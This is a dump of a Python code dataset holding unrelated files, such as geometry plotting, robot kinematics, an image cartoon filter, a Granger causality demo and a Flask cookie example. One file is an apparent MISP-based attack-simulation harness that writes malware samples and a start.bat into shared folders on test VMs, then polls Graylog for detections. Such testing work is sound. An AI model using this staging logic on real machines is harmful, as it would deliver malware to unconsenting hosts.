content
stringlengths 0
1.05M
| origin
stringclasses 2
values | type
stringclasses 2
values |
|---|---|---|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Copyright (c) 2021 Scott Weaver
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
"""
Calculate the distance between two concentric ellipses, one of which has been rotated.
"""
import os
import sys
import math
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import gridspec
# ----------
# Default values
# a is the radius along the x-axis (sometimes shown as h)
# b is the radius along the y-axis (sometimes shown as v)
# first (the outside) ellipse
a1=6.5
b1=6.0
# second (inner) rotated ellipse
a2=6.0
b2=5.0
# angles
T=20 # inner ellipse rotation angle
lT=T # line of intersection angle
# ----------
# check for obvious issues
def check_for_issues():
if T == 90 and a2 == b1:
sys.stderr.write("WARNING: " +
"The horizontal and vertical radii are equal and " +
"will result in a divide by zero runtime error." + os.linesep)
# ----------
# Calculate y for a line passing through x at an angle t.
# This is for a line passing through the origin (0, 0).
# The angle t is in degrees.
def get_position_y_at_angle(x, t):
trad = math.radians(t)
return math.tan(trad)*x
def get_position_x_at_angle(y, t):
trad = math.radians(t)
return y / math.tan(trad)
# ----------
# rational representation: https://en.wikipedia.org/wiki/Ellipse
# This method was used just for fun.
# a: horizontal radius
def get_ellipse_x_rational(u, a):
x = a * (1 - u**2) / (u**2 + 1)
return x
# b: vertical radius
def get_ellipse_y_rational(u, b):
y = (2*b*u) / (u**2 + 1)
return y
# ----------
# Standard parametric representation: https://en.wikipedia.org/wiki/Ellipse
def get_ellipse_x_standard(t, a):
return a * (math.cos(math.radians(t)))
def get_ellipse_y_standard(t, b):
return b * (math.sin(math.radians(t)))
# ----------
# rotate ellipse
def get_ellipse_x_rotated(t, a, b, r):
trad = math.radians(t)
rrad = math.radians(r)
x = (a * math.cos(trad) * math.cos(rrad)) - (b * math.sin(trad) * math.sin(rrad))
return x
def get_ellipse_y_rotated(t, a, b, r):
trad = math.radians(t)
rrad = math.radians(r)
y = (a * math.cos(trad) * math.sin(rrad)) + (b * math.sin(trad) * math.cos(rrad))
return y
# ----------
# The intersection of a line and an ellipse
def get_line_ellipse_x_intercept_standard(t, a, b):
# trad = math.radians(t)
# n=a**2 * b**2
# d=b**2 + (a**2 * math.tan(trad)**2)
# x = math.sqrt(n/d)
# # make sure we're in the right quadrant
# if lT > 90 and lT < 270:
# x*=-1
# return x
return get_line_ellipse_x_intercept_rotated(t, a, b, 0)
# ----------
# The intersection of line and rotated ellipse (at the origin)
# http://quickcalcbasic.com/ellipse%20line%20intersection.pdf
def get_line_ellipse_x_intercept_rotated(t, a, b, r):
trad = math.radians(t)
rrad = math.radians(r)
m = math.tan(trad)
if t == 90 or r == 270:
x = get_line_ellipse_y_intercept_rotated(t, a, b, r, 0)
else:
A = b**2 * (math.cos(rrad)**2 + 2 * m * math.cos(rrad) * math.sin(rrad) + m**2 * math.sin(rrad)**2) \
+ a**2 * (m**2 * math.cos(rrad)**2 - 2 * m * math.cos(rrad) * math.sin(rrad) + math.sin(rrad)**2)
B = 0 # all drops out b/c b1=0 in y=mx+b1
C = -1 * a**2 * b**2
# quadratic eq.
x = (-1 * B + math.sqrt(B**2 - 4 * A * C)) / (2 * A)
# make sure we're in the correct quadrant
if lT > 90 and lT <= 270:
x*=-1
return x
# ---------
def get_line_ellipse_y_intercept_rotated(t, a, b, r, x):
rrad = math.radians(r)
A = b**2 * math.sin(rrad)**2 + a**2 * math.cos(rrad)**2
B = 2 * x * math.cos(rrad) * math.sin(b**2 - a**2)
C = x**2 * (b**2 * math.cos(rrad)**2 + a**2 * math.sin(rrad)**2) - a**2 * b**2
# quadratic eq.
y = (-1 * B + math.sqrt(B**2 - 4 * A * C)) / (2 * A)
return get_position_x_at_angle(y, t)
# --------
def main():
check_for_issues()
# setup the plot
plt.figure(figsize=(8, 5))
gs = gridspec.GridSpec(1, 2, width_ratios=[3, 1])
ax0 = plt.subplot(gs[0])
ax1 = plt.subplot(gs[1])
ax0.set_title("Concentric Ellipses")
ax1.set_title("Distance between Ellipses")
ax1.set_xlabel("Degrees")
ax0.set_xlim(-1*(a1+1), a1+1)
ax0.set_ylim(-1*(b1+1), b1+1)
# plot a line at set angle
vect_get_position_y_at_angle = np.vectorize(get_position_y_at_angle, excluded='x')
x1 = np.arange(-1*a1, a1+1, 1.0)
ax0.plot(x1, vect_get_position_y_at_angle(x1, lT), color='red')
# Display the second (inner) ellipse before it's rotated (just for fun)
u = np.arange(-1000, 1000, 0.1)
ax0.plot(get_ellipse_x_rational(u, a2), get_ellipse_y_rational(u, b2), color='lightgray')
# plot the first ellipse (not rotated)
vect_get_ellipse_x_standard = np.vectorize(get_ellipse_x_standard, excluded='a')
vect_get_ellipse_y_standard = np.vectorize(get_ellipse_y_standard, excluded='b')
t = np.arange(0, 360, 0.01)
ax0.plot(vect_get_ellipse_x_standard(t, a1), vect_get_ellipse_y_standard(t, b1), color='orange')
# plot the second ellipse, rotated
vect_get_ellipse_x_rotated = np.vectorize(get_ellipse_x_rotated, excluded=['a', 'b', 'r'])
vect_get_ellipse_y_rotated = np.vectorize(get_ellipse_y_rotated, excluded=['a', 'b', 'r'])
t = np.arange(0, 360, 0.01)
ax0.plot(vect_get_ellipse_x_rotated(t, a2, b2, T), vect_get_ellipse_y_rotated(t, a2, b2, T), color='blue')
# plot 2 points along the line of intersection
# plot the point of intersection with the first ellipse (not rotated)
vect_get_line_ellipse_x_intercept_standard = np.vectorize(get_line_ellipse_x_intercept_standard, excluded=['a', 'b'])
x=get_line_ellipse_x_intercept_standard(lT, a1, b1)
y=get_position_y_at_angle(x, lT)
print ("green: %f,%f" % (x,y))
# should be a green dot on the orange ellipse intersecting the red line
ax0.plot(x, y, 'ro', color='green')
# plot the point of intersection with the second ellipse (rotated)
vect_get_line_ellipse_x_intercept_rotated = np.vectorize(get_line_ellipse_x_intercept_rotated, excluded=['a', 'b', 'r'])
x=get_line_ellipse_x_intercept_rotated(lT, a2, b2, T)
y=get_position_y_at_angle(x, lT)
print ("black: %f,%f" % (x,y))
# should be a black dot on the blue ellipse intersecting the red line
ax0.plot(x, y, 'ro', color='black')
# ----------
# calculate the difference between the two ellipses
t = np.arange(0, 360, 0.1)
xnorm=vect_get_line_ellipse_x_intercept_standard(t, a1, b1)
ynorm=vect_get_position_y_at_angle(xnorm, t)
xrot=vect_get_line_ellipse_x_intercept_rotated(t, a2, b2, T)
yrot=vect_get_position_y_at_angle(xrot, t)
# find the diff and when the inner is outside the outer ellipse preserve the sign
# (divide by zero is possible and should be caught)
vect_hypot = np.vectorize(math.hypot)
diff = vect_hypot(xnorm-xrot, ynorm-yrot) * ((xnorm-xrot) / abs(xnorm-xrot))
ax1.plot(t, diff, color='pink')
# ----------
ax0.set_aspect('equal', 'box')
plt.tight_layout()
plt.show()
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
from setuptools import setup, find_packages
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='irobot',
version='1.0.0b3',
description='Python implementation of iRobot''s Open Interface',
long_description=long_description,
url='http://blog.lemoneerlabs.com',
author='Matthew Witherwax (lemoneer)',
author_email='mwax@lemoneerlabs.com ',
# Choose your license
license='MIT',
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 4 - Beta',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Software Development',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
keywords='robotics irobot roomba',
packages=find_packages(),
install_requires=['pyserial', 'six'],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
entry_points={
'console_scripts': [
'create2=irobot.console_interfaces.create2:main'
],
},
)
|
nilq/baby-python
|
python
|
from helperfunctions_plot import *
from plane_relative import *
from denavit_hartenberg140 import *
import itertools as it
def work_it(M, func=n.diff, axis=1):
return np.apply_along_axis(func, axis, arr=M)
def get_closest_solutions_pair(s0, s1):
## diff_list = []
## index_list0 = []
## index_list1 = []
## for i0, k in enumerate(s0):
## for i1, l in enumerate(s1):
## diff_list.append(k-l)
## index_list0.append(i0)
## index_list1.append(i1)
## index_list0 = mat(index_list0)
## index_list1 = mat(index_list1)
## diff_list = mat(diff_list)
## norm_list = mat(map(norm, diff_list))
## t = (norm_list - min(norm_list)) == 0.0
## index0 = index_list0[t][0]
## index1 = index_list1[t][0]
## return mat((s0[index0], s1[index1]))
data = []
for i, s0i in enumerate(s0):
for j, s1j in enumerate(s1):
data.append([norm(s0i - s1j, ord = None), i, j])
data = mat(data)
ret = []
solution_col_row_pairs = n.argwhere(data == data.min(axis = 0)[0])
solution_indices = solution_col_row_pairs[:,0]
for solution_data in data[solution_indices]:
norm_value, i, j = solution_data
pair = mat([s0[i], s1[j]])
return pair
def get_closest_solution(s0, s):
diff_list = []
index_list1 = []
for i1, l in enumerate(s):
diff_list.append(s0-l)
index_list1.append(i1)
index_list1 = mat(index_list1)
diff_list = mat(diff_list)
norm_list = mat(map(norm, diff_list))
t = (norm_list - min(norm_list)) == 0.0
index1 = index_list1[t][0]
return s[index1]
def add_solutions(solutions, solution_value, index=5):
for s in solutions.T:
tmp1 = s.copy()
tmp2 = s.copy()
old_val = s[index]
tmp1[index] = old_val + solution_value
yield tmp1
tmp2[index] = old_val - solution_value
yield tmp2
def traverse_solutions(*args):
for solutions in args:
for s in solutions.T:
yield s
def make_array(list_of):
return mat(list_of).T
if __name__ == '__main__':
for count in n.linspace(-180,180,10):
ax, fig = init_plot()
fig.clear()
j1 = 180 #rand_range(-180, 180)
j2 = 0#rand_range(-90, 110)
j3 = 0#rand_range(-230, 50)
j4 = 0#rand_range(-200, 200)
j5 = 0#rand_range(-115, 115)
j6 = 0#rand_range(-400, 400)
j1,j2,j3,j4,j5,j6 = (-140.0, -14.35476839088895, 20.6520766452779, 0, 0, 0)
joint_values = j1,j2,j3,j4,j5,j6
T44, debug = forward_kinematics(*joint_values, **DH_TABLE)
sol = inverse_kinematics_irb140(DH_TABLE, T44)
plane0 = define_plane_from_angles([0,0,0],0, 0, 0)
global_robot = matmul_series(*debug)
global_robot.insert(0, debug[0])
global_robot.insert(0, plane0)
global_robot = mat(global_robot)
global_robot_points = global_robot[:,:3,3]
point_matrix = generate_symmetric_curve()
point_matrix_tf = get_transformed_points(T44, point_matrix)
######
ax = fig.add_subplot(1,2,1, projection='3d')
for p in global_robot:
plot_plane(ax, p, '--',scale_factor=0.1)
ax.scatter(point_matrix_tf[:,0],point_matrix_tf[:,1],point_matrix_tf[:,2])
ax.plot(global_robot_points[:,0], global_robot_points[:,1], global_robot_points[:,2],'k',linewidth=2)
plot_equal_perspective(ax, [-0.5,0.5],[-0.5,0.5],[0,1])
#show()
######
plane = global_robot[-1]
s = point_matrix_tf
all_solutions = []
for p in s:
T44 = n.zeros((4,4))
T44[:,3] = p
T44[:3,:3] = plane[:3,:3]
solutions = inverse_kinematics_irb140(DH_TABLE, T44)
solutions = filter_solutions(solutions)
print solutions.T.shape
all_solutions.append(solutions.T)
a = mat(all_solutions)
import time
start = time.time()
#### l = []
#### for i in xrange(len(a)-1):
#### l.append(get_closest_solutions_pair(a[i], a[i+1]))
#### l = mat(l)
sol = []
pair = get_closest_solutions_pair(a[0],a[1])
sol.append(pair[0])
for i in xrange(1,len(a)):
sol.append(get_closest_solution(sol[i-1],a[i]))
sol = mat(sol)
## s = list(l[:,0,:])
## s.append(l[-1,1,:])
## s = mat(s)
print 'stop: %0.2f' % (time.time() - start)
r = work_it(work_it(sol, func=diff, axis=0),func=norm, axis=1)
#r = n.max(n.abs(n.diff(sol,axis=0)),axis=1)
## if (r >= 180.0).any():
## print r
## print n.round(n.max(n.abs(work_it(sol, func=diff, axis=0)),0))
## import pdb; pdb.set_trace()
ax0 = fig.add_subplot(1,2,2)
ax0.plot(n.linspace(0,360,49),r);
xlabel('curve angle')
ylabel('solution distance')
show()
break
print n.round(n.max(n.abs(work_it(sol, func=diff, axis=0)),0))
#show()
#plot(n.max(abs(s-sol), axis=1)); show()
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
"""
Author:by 王林清 on 2021/10/31 18:44
FileName:lunyu.py in shiyizhonghua_resource
Tools:PyCharm python3.8.4
"""
from util import get_time_str, save_split_json, get_json
if __name__ == '__main__':
author = {
'name': '孔子',
'time': '春秋',
'desc': '孔子(公元前551年9月28日~公元前479年4月11'
'日),子姓,孔氏,名丘,字仲尼,鲁国陬邑(今山东省曲阜市)'
'人,祖籍宋国栗邑(今河南省夏邑县),中国古代伟大的思想家、'
'政治家、教育家,儒家学派创始人、“大成至圣先师”。 '
}
datas = []
data = get_json(r'./../data/lunyu/lunyu.json')
for dic in data:
time = get_time_str()
datas.append({
'title': f"论语·{dic['chapter']}",
'author': author,
'type': '古文',
'content': dic['paragraphs'],
'create_time': time,
'update_time': time,
'valid_delete': True
})
save_split_json('lunyu', datas)
|
nilq/baby-python
|
python
|
import cv2 as cv
import os
import numpy as np
class Cartonifier:
def __init__(self, n_downsampling_steps=2, n_filtering_steps=7):
self.num_down = n_downsampling_steps
self.num_bilateral = n_filtering_steps
# def process_folder(self, input_folder, output_folder):
# if not os.path.exists(input_folder):
# raise FileNotFoundError('Input folder {} not found'.format(input_folder))
# if not os.path.exists(output_folder):
# raise FileNotFoundError('Output folder {} not found'.format(output_folder))
# file_path_list = fu.get_absolute_path_list(input_folder)
# for file_path in file_path_list:
# self.process(file_path, output_folder)
def process(self, image, max_value=200):
img_rgb = image
# downsample image using Gaussian pyramid
img_color = img_rgb
for _ in range(self.num_down):
img_color = cv.pyrDown(img_color)
# repeatedly apply small bilateral filter instead of
# applying one large filter
for _ in range(self.num_bilateral):
img_color = cv.bilateralFilter(img_color, d=9, sigmaColor=9, sigmaSpace=7)
# upsample image to original size
for _ in range(self.num_down):
img_color = cv.pyrUp(img_color)
# convert to grayscale and apply median blur
img_gray = cv.cvtColor(img_rgb, cv.COLOR_RGB2GRAY)
img_blur = cv.medianBlur(img_gray, 7)
# detect and enhance edges
img_edge = self.edge_detection_v1(img_blur, max_value)
if img_color.shape[0] != img_edge.shape[0] or img_color.shape[1] != img_edge.shape[1]:
img_color = cv.resize(img_color, (img_edge.shape[1], img_edge.shape[0]))
img_cartoon = cv.bitwise_and(img_color, img_edge)
return img_cartoon
def edge_detection_v1(self, img_blur, max_value):
img_edge = cv.adaptiveThreshold(img_blur, max_value,
cv.ADAPTIVE_THRESH_MEAN_C,
cv.THRESH_BINARY,
blockSize=9,
C=4)
# convert back to color, bit-AND with color image
img_edge = cv.cvtColor(img_edge, cv.COLOR_GRAY2RGB)
return img_edge
# def process_image(self, src):
# self.alpha += 0.01
# if self.alpha > 1:
# self.alpha = 0
# self.current_model += 1
# if self.current_model >= len(self.model_list):
# self.current_model = 1
#
# # Edge detection
# img_edge = self.edge_detection_v2(src)
#
# # Coloured image from ML models
# img_colors = self.feed_forward(src)
#
# # Compose layers
# img_blend = np.clip(((1 - self.beta) * (img_colors - img_edge * 0.1) + self.beta * self.frame).astype(np.uint8),
# 0, 255)
#
# # Blur for smooth effect
# dst = cv.GaussianBlur(img_blend, (5, 5), cv.BORDER_DEFAULT)
# return dst
#
# def edge_detection_v2(self, src):
# dst = cv.GaussianBlur(src, (5, 5), cv.BORDER_DEFAULT)
# dst = cv.Canny(dst, 50, 200)
# # dst = self.edge_detection_v1(dst)
# dst = cv.cvtColor(dst, cv.COLOR_GRAY2RGB)
# dst = np.ones_like(dst) * 255 - dst
# return dst
if __name__ == '__main__':
c = Cartonifier()
c.process("/Users/gilbert/Desktop/test.jpg", "/Users/gilbert/Desktop/out")
|
nilq/baby-python
|
python
|
"""
AR : conditional covariance based Granger Causality
===================================================
This example reproduces the results of Ding et al. 2006 :cite:`ding2006granger`
where in Fig3 there's an indirect transfer of information from Y->X that is
mediated by Z. The problem is that if the Granger Causality is used, there's
indeed a transfer of information from Y->X while with the conditional Granger
causality, conditioning by the past of other sources suppresses this indirect
transfer.
"""
import numpy as np
from frites import set_mpl_style
from frites.simulations import StimSpecAR
from frites.conn import conn_covgc
import matplotlib.pyplot as plt
set_mpl_style()
###############################################################################
# Simulate 3 nodes 40hz oscillations
# ----------------------------------
#
# Here, we use the class :class:`frites.simulations.StimSpecAR` to simulate an
# stimulus-specific autoregressive model made of three nodes (X, Y and Z). This
# network simulates a transfer Y->Z and Z->X such as an indirect transfer from
# Y->X mediated by Z
ar_type = 'ding_3_indirect' # 40hz oscillations
n_stim = 2 # number of stimulus
n_epochs = 50 # number of epochs per stimulus
ss = StimSpecAR()
ar = ss.fit(ar_type=ar_type, n_epochs=n_epochs, n_stim=n_stim)
###############################################################################
# plot the network
plt.figure(figsize=(5, 4))
ss.plot_model()
plt.show()
###############################################################################
# Compute the Granger-Causality
# -----------------------------
#
# We first compute the Granger Causality and then the conditional Granger
# causality (i.e conditioning by the past coming from other sources)
dt, lag, step = 50, 5, 2
t0 = np.arange(lag, ar.shape[-1] - dt, step)
kw_gc = dict(dt=dt, lag=lag, step=1, t0=t0, roi='roi', times='times',
n_jobs=-1)
# granger causality
gc = conn_covgc(ar, conditional=False, **kw_gc)
# conditional granger causality
gc_cond = conn_covgc(ar, conditional=True, **kw_gc)
###############################################################################
# Plot the Granger causality
plt.figure(figsize=(12, 10))
ss.plot_covgc(gc)
plt.tight_layout()
plt.show()
###############################################################################
# Plot the conditional Granger causality
plt.figure(figsize=(12, 10))
ss.plot_covgc(gc_cond)
plt.tight_layout()
plt.show()
###############################################################################
# Direct comparison
# -----------------
#
# In this plot, we only select the transfer of information from Y->X for both
# granger and conditional granger causality
# select Y->X and mean per stimulus for the granger causality
gc_yx = gc.sel(roi='x-y', direction='y->x').groupby('trials').mean('trials')
gc_yx = gc_yx.rename({'trials': 'stimulus'})
# select Y->X and mean per stimulus for the conditional granger causality
gc_cond_yx = gc_cond.sel(roi='x-y', direction='y->x').groupby('trials').mean(
'trials')
gc_cond_yx = gc_cond_yx.rename({'trials': 'stimulus'})
# get (min, max) of granger causality from Y->X
gc_min = min(gc_yx.data.min(), gc_cond_yx.data.min())
gc_max = max(gc_yx.data.max(), gc_cond_yx.data.max())
# sphinx_gallery_thumbnail_number = 4
plt.figure(figsize=(10, 5))
# plot granger causality from Y->X
plt.subplot(121)
gc_yx.plot.line(x='times', hue='stimulus')
plt.title(r'Granger causality Y$\rightarrow$X', fontweight='bold')
plt.axvline(0, color='k', lw=2)
plt.ylim(gc_min, gc_max)
# plot the conditional granger causality from Y->X
plt.subplot(122)
gc_cond_yx.plot.line(x='times', hue='stimulus')
plt.title(r'Conditional Granger causality Y$\rightarrow$X|others',
fontweight='bold')
plt.axvline(0, color='k', lw=2)
plt.ylim(gc_min, gc_max)
plt.tight_layout()
plt.show()
|
nilq/baby-python
|
python
|
#! bin/bash/python3
# Solution to Mega Contest 1 Problem: Sell Candies
for testcase in range(int(input())):
net_revenue = 0
n = int(input())
vals = list(map(int, input().split()))
vals.sort(reverse=True)
cost_reduction = 0
for val in vals:
net_revenue += max(val-cost_reduction, 0)
net_revenue %= int(1e9+7)
cost_reduction += 1
print(net_revenue)
|
nilq/baby-python
|
python
|
# ------------------------------------------------------------------------
# DT-MIL
# Copyright (c) 2021 Tencent. All Rights Reserved.
# ------------------------------------------------------------------------
def build_dataset(image_set, args):
from .wsi_feat_dataset import build as build_wsi_feat_dataset
return build_wsi_feat_dataset(image_set, args)
|
nilq/baby-python
|
python
|
from .misc import (
camel_to_underscore,
convert_date,
convert_datetime,
dict_from_dataframe,
dir_list,
download_if_new,
get_ulmo_dir,
mkdir_if_doesnt_exist,
module_with_dependency_errors,
module_with_deprecation_warnings,
open_file_for_url,
parse_fwf,
raise_dependency_error,
save_pretty_printed_xml,
)
try:
from .pytables import (
get_default_h5file_path,
get_or_create_group,
get_or_create_table,
open_h5file,
update_or_append_sortable,
)
except ImportError:
get_default_h5file_path = raise_dependency_error
get_or_create_group = raise_dependency_error
get_or_create_table = raise_dependency_error
open_h5file = raise_dependency_error
update_or_append_sortable = raise_dependency_error
|
nilq/baby-python
|
python
|
from flask import Flask
from flask import make_response
app = Flask(__name__)
@app.route('/')
def index():
response = make_response('<h1>This document carries a cookie!</h1>')
response.set_cookie('answer', '42')
return response
if __name__ == '__main__':
app.run()
|
nilq/baby-python
|
python
|
#!/usr/bin/env /usr/bin/python3
# -*- coding: utf-8 -*-
from pymisp import PyMISP
from key import *
import json
import time
import os
from urllib.parse import urljoin
import sys
import traceback
from shutil import copyfile
import logging.handlers
from urllib.parse import quote
import argparse
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
handler = logging.handlers.SysLogHandler(address='/dev/log')
formatter = logging.Formatter('APTC: [%(levelname)s][%(filename)s:%(funcName)s():line %(lineno)s] %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
# ensure prefix ends with /
conf_target_path_prefix = '/opt/aptc/targets/' # in case of changing path
conf_script_path_prefix = os.path.dirname(os.path.realpath(__file__)) + '/' # change to /opt/pec later
conf_vm_wait_sec = 60 * 5
conf_poll_sleep_interval_sec = 2
conf_graylog_poll_timeout_sec = 60 * 1
conf_tag_prefix = 'aptc:'
target_query_strings = {} # hostname:query_string
def init(url, key):
return PyMISP(url, key, False, 'json', False)
def get_all_target_host_names(test_case):
host_names = []
share_paths = get_all_target_share_paths(test_case)
for t in share_paths:
hn = t.split('/')
host_names.append(hn[len(hn)-1])
return host_names
def get_all_target_share_paths(test_case):
share_paths = []
targets = get_related_targets(test_case)
for t in targets:
share_paths.append(t['Event']['info'])
return share_paths
def get_related_targets(test_case):
targets = []
if 'RelatedEvent' not in str(test_case):
return targets
for re in test_case['Event']['RelatedEvent']:
if re['Event']['info'].startswith(conf_target_path_prefix):
targets.append(re)
return targets
def get_all_query_strings(m, testcase_id=0):
found = False
r = m.search(eventid=testcase_id)
if 'Tag' not in str(r):
logger.error(str(r))
return found
for e in r['response']:
for t in e['Event']['Tag']:
if t['name'] != conf_tag_prefix + 'test-in-progress':
continue
found = True
related = get_related_targets(e)
for r in related:
if r['Event']['info'] in target_query_strings:
continue
qs = get_target_query_string(m, r['Event']['id'])
target_query_strings[r['Event']['info']] = qs
return found
def write_payload(m, payload_id, test_case):
status, samples = m.download_samples(False, payload_id)
if not status:
return status
share_paths = get_all_target_share_paths(test_case)
total_sample_count = len(samples)
for vm_path in share_paths:
sample_counter = 0
for sample in samples:
sample_counter += 1
filepath = vm_path + '/' + sample[1]
with open(filepath, 'wb') as out:
try:
out.write(sample[2].read())
logger.debug('wrote: ' + filepath)
sample[2].seek(0) # otherwise next target will get a 0 byte file
if sample_counter == total_sample_count:
get_start_bat(m, payload_id, vm_path)
except OSError:
logger.error('fail writing ' + filepath)
continue
if sample_counter == 1: # tag only the first sample
tag(m, payload_id, conf_tag_prefix + 'test-in-progress')
logger.debug('tagged ' + str(payload_id) + ' with ' + conf_tag_prefix + 'test-in-progress')
hostname = vm_path.replace(conf_target_path_prefix, '')
newtag = conf_tag_prefix + '{"target":"' + hostname + '","testcase-id":'
newtag += str(test_case['Event']['id']) + ',"filename":"' + sample[1] + '"}'
m.new_tag(newtag, '#000000', True)
tag(m, payload_id, newtag)
return status
def get_payload_tags(test_case):
t = []
if 'Tag' not in str(test_case):
return t
if 'Tag' in test_case['Event']:
for et in test_case["Event"]["Tag"]:
if et['name'].startswith(conf_tag_prefix + 'payload'):
t.append(et['name'])
return t
def find_tag(m, eid, tag):
r = m.search(eventid=eid)
if 'Tag' not in str(r):
return False
if 'Tag' in r['response'][0]['Event']:
for t in r['response'][0]['Event']['Tag']:
if t['name'].startswith(tag):
return True
return False
def get_all_tags(m, eid):
r = m.search(eventid=eid)
if 'Tag' not in str(r):
return []
if 'Tag' in r['response'][0]['Event']:
return r['response'][0]['Event']['Tag']
return []
def dump(r):
print(json.dumps(r, indent=2))
def wait_for_targets(m, payload_id, test_case):
timeout_sec = conf_vm_wait_sec
all_vm = get_all_target_host_names(test_case)
while len(all_vm) > 0:
for vm in all_vm:
tags = get_all_tags(m, payload_id) # payload may have old results
tags_str = str(tags)
if 'result_' in tags_str and vm in tags_str:
if vm in all_vm:
all_vm.remove(vm)
if len(all_vm) == 0:
break
time.sleep(conf_poll_sleep_interval_sec)
timeout_sec -= conf_poll_sleep_interval_sec
if timeout_sec <= 0:
logger.error('abort due to timeout')
exit()
untag(m, payload_id, conf_tag_prefix + 'test-in-progress')
logger.info('All VM(s) done for payload-' + str(payload_id))
def tag(m, eid, tagname):
try:
r = m.get_event(eid)
m.tag(r['Event']['uuid'], tagname)
logger.debug('tag event ' + str(eid) + ' with ' + str(tagname))
except:
logger.debug(traceback.format_exc())
return True
def untag(m, eid, tagname):
r = m.search(eventid=eid)
if 'uuid' not in str(r):
logger.error(str(r))
return False
uuid = r['response'][0]['Event']['uuid']
for t in r['response'][0]['Event']['Tag']:
if t['name'] == tagname:
logger.debug('untagged ' + tagname + ' from ' + uuid)
m.untag(uuid, t['id'])
return True
def delete_tag(m, eventid, tagname):
r = m.search(eventid=eventid)
if 'Tag' not in str(r):
logger.error(str(r))
return
for t in r['response'][0]['Event']['Tag']:
if t['name'] == tagname:
logger.info('found tagid ' + t['id'])
session = m._PyMISP__prepare_session()
url = urljoin(m.root_url, 'tags/delete/{}'.format(t['id']))
session.post(url)
return
def get_target_query_string(m, target_id):
r = m.search(eventid=target_id)
if 'Attribute' not in str(r):
return ''
for a in r['response'][0]['Event']['Attribute']:
if a['comment'].startswith('graylog'):
return a['value']
return ''
def create_n_tag(m, eventid, tagname, tagcolor):
m.new_tag(tagname, tagcolor, True)
tag(m, eventid, tagname)
def get_start_bat(m, payload_id, target_path):
r = m.search(eventid=payload_id)
if 'Attribute' not in str(r):
logger.error(str(r))
return
for a in r['response'][0]['Event']['Attribute']:
if a['comment'].lower() != 'start.bat':
continue
with open(target_path + '/start.bat', 'w') as out:
try:
out.write(a['value'])
logger.info('wrote: ' + target_path + '/start.bat')
except:
logger.error('fail writing start.bat for payload ' + payload_id)
return
return
def query_graylog(m, query, filename=''):
session = m._PyMISP__prepare_session() # I know this is bad thing...
url = query
if len(filename) == 0:
url = url.replace('FILENAME%20AND%20', '')
else:
url = url.replace('FILENAME', quote(filename))
response = session.get(url)
r = json.loads(response.text)
return int(r['total_results'])
def get_reboot_wait_query(m, target_id):
q = ''
r = m.search(eventid=target_id)
if 'id' not in str(r):
return q
for e in r['response']:
for a in e['Event']['Attribute']:
if 'reboot' in a['comment']:
q = a['value']
break
return q
def rollback_targets(m, test_case):
target_paths = {}
wait_vm = []
wait_sec = conf_vm_wait_sec
if 'RelatedEvent' not in str(test_case):
return
if len(test_case['Event']['RelatedEvent']) == 0:
return
logger.info('starting target roll-back...')
for rt in test_case['Event']['RelatedEvent']:
if rt['Event']['info'].startswith(conf_target_path_prefix):
target_paths[rt['Event']['info']] = get_reboot_wait_query(m, rt['Event']['id'])
if len(target_paths[rt['Event']['info']]) > 0:
copyfile(conf_target_path_prefix + 'shutdown.bat', rt['Event']['info'] + '/start.bat')
wait_vm.append(rt['Event']['info'])
logger.info('waiting for target reboot...')
while len(wait_vm) > 0:
for k, v in target_paths.items():
try:
rc = query_graylog(m, v)
except BaseException as e:
logger.error('graylog query failed: ' + str(e))
error_tag = conf_tag_prefix + ' roll-back error with graylog result poll', '#aa0000'
create_n_tag(m, test_case['Event']['id'], error_tag)
return
if rc > 0:
if k in wait_vm:
wait_vm.remove(k)
logger.debug(str(len(wait_vm)) + ' left...')
wait_sec -= conf_poll_sleep_interval_sec
if wait_sec <= 0:
break
time.sleep(conf_poll_sleep_interval_sec)
return
|
nilq/baby-python
|
python
|
# (C) Datadog, Inc. 2019-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import os
import platform
import stat
import subprocess
import click
import requests
from ....fs import ensure_parent_dir_exists
from ...constants import get_root
from ...testing import get_test_envs
from ..console import CONTEXT_SETTINGS, echo_debug, echo_info
COMPOSE_VERSION = 'v2.5.0'
COMPOSE_RELEASES_URL = f'https://github.com/docker/compose/releases/download/{COMPOSE_VERSION}/'
def upgrade_docker_compose(platform_name):
if platform_name == 'windows':
artifact_name = 'docker-compose-windows-x86_64.exe'
executable_name = 'docker-compose.exe'
else:
artifact_name = 'docker-compose-linux-x86_64'
executable_name = 'docker-compose'
executable_path = os.path.join(os.path.expanduser('~'), '.docker', 'cli-plugins', executable_name)
